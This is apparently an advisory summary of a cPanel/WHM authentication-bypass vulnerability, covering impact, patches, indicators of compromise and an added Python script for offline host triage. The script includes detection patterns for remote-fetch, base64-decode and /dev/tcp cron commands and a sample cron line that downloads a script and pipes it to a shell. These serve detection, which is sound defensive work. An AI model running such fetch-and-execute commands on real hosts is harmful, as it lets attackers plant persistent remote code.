Full Report
Exploitation was underway before patches landed; at least one victim reports a ransomware demand. CISA has added a critical cPanel bug to its known-exploited list, confirming that attackers are already poking holes in one of the internet's most widely used hosting stacks.…
Analysis Summary
# Vulnerability: Critical Authentication Bypass in cPanel & WHM
## CVE Details
- **CVE ID:** CVE-2026-41940
- **CVSS Score:** 9.8 (Critical)
- **CWE:** Not specified in the source text; the described behaviour is a failure of authentication validation (authentication bypass).
## Affected Systems
- **Products:** cPanel, WebHost Manager (WHM), and WP Squared.
- **Versions:** All supported versions released after version 11.40.
- **Configurations:** Internet-exposed instances (approximately 1.5 million identified via Shodan).
## Vulnerability Description
The vulnerability is a critical authentication bypass flaw that allows an unauthenticated remote attacker to gain full administrative control (root-level access) over the hosting server. By bypassing the primary security layer of the cPanel/WHM stack, attackers can execute arbitrary commands, manage files, and access all hosted accounts on the affected machine.
## Exploitation
- **Status:** Exploited in the wild (Confirmed by CISA and hosting providers).
- **Complexity:** Low (Implied by the scale of automated attacks and CVSS score).
- **Attack Vector:** Network (Remote).
## Impact
- **Confidentiality:** Total (Full access to all server and user data).
- **Integrity:** Total (Ability to modify system files, website content, and configurations).
- **Availability:** Total (Reported cases of ransomware encryption and service shutdowns by providers).
## Remediation
### Patches
- **cPanel/WHM:** Users must update to the latest patched versions released on or after Tuesday, April 28, 2026.
- **WP Squared:** Patches are available alongside the core cPanel updates.
### Workarounds
- **Access Control:** Restrict access to cPanel/WHM ports (e.g., 2082, 2083, 2086, 2087) via firewall/IP whitelisting.
- **Service Suspension:** Temporarily disable the cPanel/WHM interface until patches are applied (as seen with Namecheap’s response).
## Detection
- **Indicators of Compromise:**
  - Evidence of ransomware (payment demands, encrypted files).
  - Log entries showing unauthorized administrative logins, dating back as early as 2/23/2026.
  - Presence of unknown administrative accounts or SSH keys.
- **Detection methods and tools:**
  - Monitor server logs for unusual activity on the WHM/cPanel administrative ports.
  - Check for unauthorized cron jobs or web shells in user directories.
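The following script turns the indicators above into a repeatable host triage: it parses login-log lines for successful root logins from outside an allowlist on or after the earliest date the report mentions, flags `authorized_keys` entries whose key blob is not on a known-good list, and flags cron entries that fetch and execute remote content. It is an added example, not code from the report, CISA, Rapid7 or cPanel; the login-log layout, the file contents and every IP, user and key in it are constructed assumptions so it runs offline.

```python
"""Offline triage of the host-level indicators listed in the Detection section.

Added example, not code from the report or from cPanel. The login-log layout,
the sample file contents and every IP, user and key below are constructed
assumptions so the script runs without touching a real server.
"""
import re
from datetime import datetime, timezone

# Assumed layout of a WHM/cPanel login-log line (constructed, not the vendor's
# documented format): [timestamp] level [service] ip - user "request" RESULT
LOGIN_LINE = re.compile(
    r'^\[(?P<ts>[^\]]+)\] \w+ \[(?P<svc>\w+)\] (?P<ip>\S+) - (?P<user>\S+) '
    r'"(?P<req>[^"]*)" (?P<result>\S+)'
)

# Cron commands that pipe downloaded content into a shell, decode an encoded
# payload, or open a raw socket via bash's /dev/tcp device.
CRON_RED_FLAGS = re.compile(
    r'\b(curl|wget)\b[^|]*\|\s*(ba)?sh\b|\bbase64\s+-d\b|/dev/tcp/'
)

# Token prefixes that identify the key-type field of an authorized_keys entry
KEY_TYPE_PREFIXES = ("ssh-", "ecdsa-", "sk-")

# --- constructed sample inputs (documentation IP ranges, placeholder keys) ----
SAMPLE_LOGIN_LOG = """\
[2026-02-20 08:01:12 +0000] info [whostmgrd] 198.51.100.10 - root "GET /login/?login_only=1 HTTP/1.1" SUCCESS
[2026-02-23 03:14:07 +0000] info [whostmgrd] 203.0.113.77 - root "GET /login/?login_only=1 HTTP/1.1" SUCCESS
[2026-02-23 03:14:09 +0000] info [cpaneld] 203.0.113.77 - alice "POST /login/ HTTP/1.1" FAILED
[2026-03-02 22:40:51 +0000] info [whostmgrd] 203.0.113.78 - root "GET /login/?login_only=1 HTTP/1.1" SUCCESS
"""
SAMPLE_AUTHORIZED_KEYS = """\
# root's authorized_keys (constructed)
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKnownAdminKeyPlaceholder ops@example.net
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQUnknownKeyPlaceholder x@x
"""
SAMPLE_CRONTAB = """\
0 3 * * * /usr/local/bin/backup-accounts.sh
30 2 * * * /usr/bin/find /home/alice/tmp -mtime +7 -delete
*/5 * * * * curl -s http://198.51.100.200/x.sh | sh
"""


def parse_login_log(text):
    """Turn login-log text into a list of dicts; lines that do not match are skipped."""
    events = []
    for line in text.splitlines():
        m = LOGIN_LINE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S %z")
        events.append({"ts": ts, "service": m["svc"], "ip": m["ip"],
                       "user": m["user"], "result": m["result"]})
    return events


def suspicious_admin_logins(events, trusted_sources, not_before="2026-02-23"):
    """Successful root logins from outside the allowlist on or after the earliest
    date the report associates with the campaign (default 2/23/2026, UTC)."""
    cutoff = datetime.strptime(not_before, "%Y-%m-%d").replace(tzinfo=timezone.utc)
    return [e for e in events
            if e["result"] == "SUCCESS" and e["user"] == "root"
            and e["ip"] not in trusted_sources and e["ts"] >= cutoff]


def unknown_ssh_keys(authorized_keys_text, known_key_blobs):
    """Entries whose key blob is not in the known-good set. Option prefixes
    (e.g. command="...") are tolerated by locating the key-type token; an entry
    that cannot be parsed is treated as unknown rather than silently ignored."""
    unknown = []
    for line in authorized_keys_text.splitlines():
        entry = line.strip()
        if not entry or entry.startswith("#"):
            continue
        parts = entry.split()
        idx = next((i for i, p in enumerate(parts) if p.startswith(KEY_TYPE_PREFIXES)), None)
        if idx is None or idx + 1 >= len(parts) or parts[idx + 1] not in known_key_blobs:
            unknown.append(entry)
    return unknown


def suspicious_cron_entries(crontab_text):
    """Cron lines matching the remote-fetch / decode / raw-socket patterns."""
    return [line.strip() for line in crontab_text.splitlines()
            if line.strip() and not line.strip().startswith("#")
            and CRON_RED_FLAGS.search(line)]


def triage(login_log, authorized_keys, crontab, trusted_sources, known_key_blobs,
           not_before="2026-02-23"):
    """Run all three checks and return the findings keyed by indicator."""
    events = parse_login_log(login_log)
    return {
        "admin_logins": suspicious_admin_logins(events, trusted_sources, not_before),
        "unknown_keys": unknown_ssh_keys(authorized_keys, known_key_blobs),
        "cron": suspicious_cron_entries(crontab),
    }


if __name__ == "__main__":
    findings = triage(SAMPLE_LOGIN_LOG, SAMPLE_AUTHORIZED_KEYS, SAMPLE_CRONTAB,
                      trusted_sources={"198.51.100.10"},
                      known_key_blobs={"AAAAC3NzaC1lZDI1NTE5AAAAIKnownAdminKeyPlaceholder"})
    for kind, items in findings.items():
        print(f"{kind}: {len(items)} finding(s)")
        for item in items:
            print("  ", item.get("ip", item) if isinstance(item, dict) else item)
```

On a real host, feed the functions the contents of the actual login log, each account's `authorized_keys`, and the output of `crontab -l` per user; the trusted-source and known-key allowlists should come from change records, not from whatever is on the box today, since a compromised host's current state is the thing under question.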
## References
- **CISA KEV Catalog:** hxxps[://]www[.]cisa[.]gov/known-exploited-vulnerabilities-catalog
- **Third-Party Analysis (Rapid7):** hxxps[://]www[.]rapid7[.]com/blog/post/etr-cve-2026-41940-cpanel-whm-authentication-bypass/
- **NVD Entry:** hxxps[://]nvd[.]nist[.]gov/vuln/detail/CVE-2026-41940
- **Provider Status (Namecheap):** hxxps[://]www[.]namecheap[.]com/status-updates/ongoing-critical-security-vulnerability-in-cpanel-april-28-2026/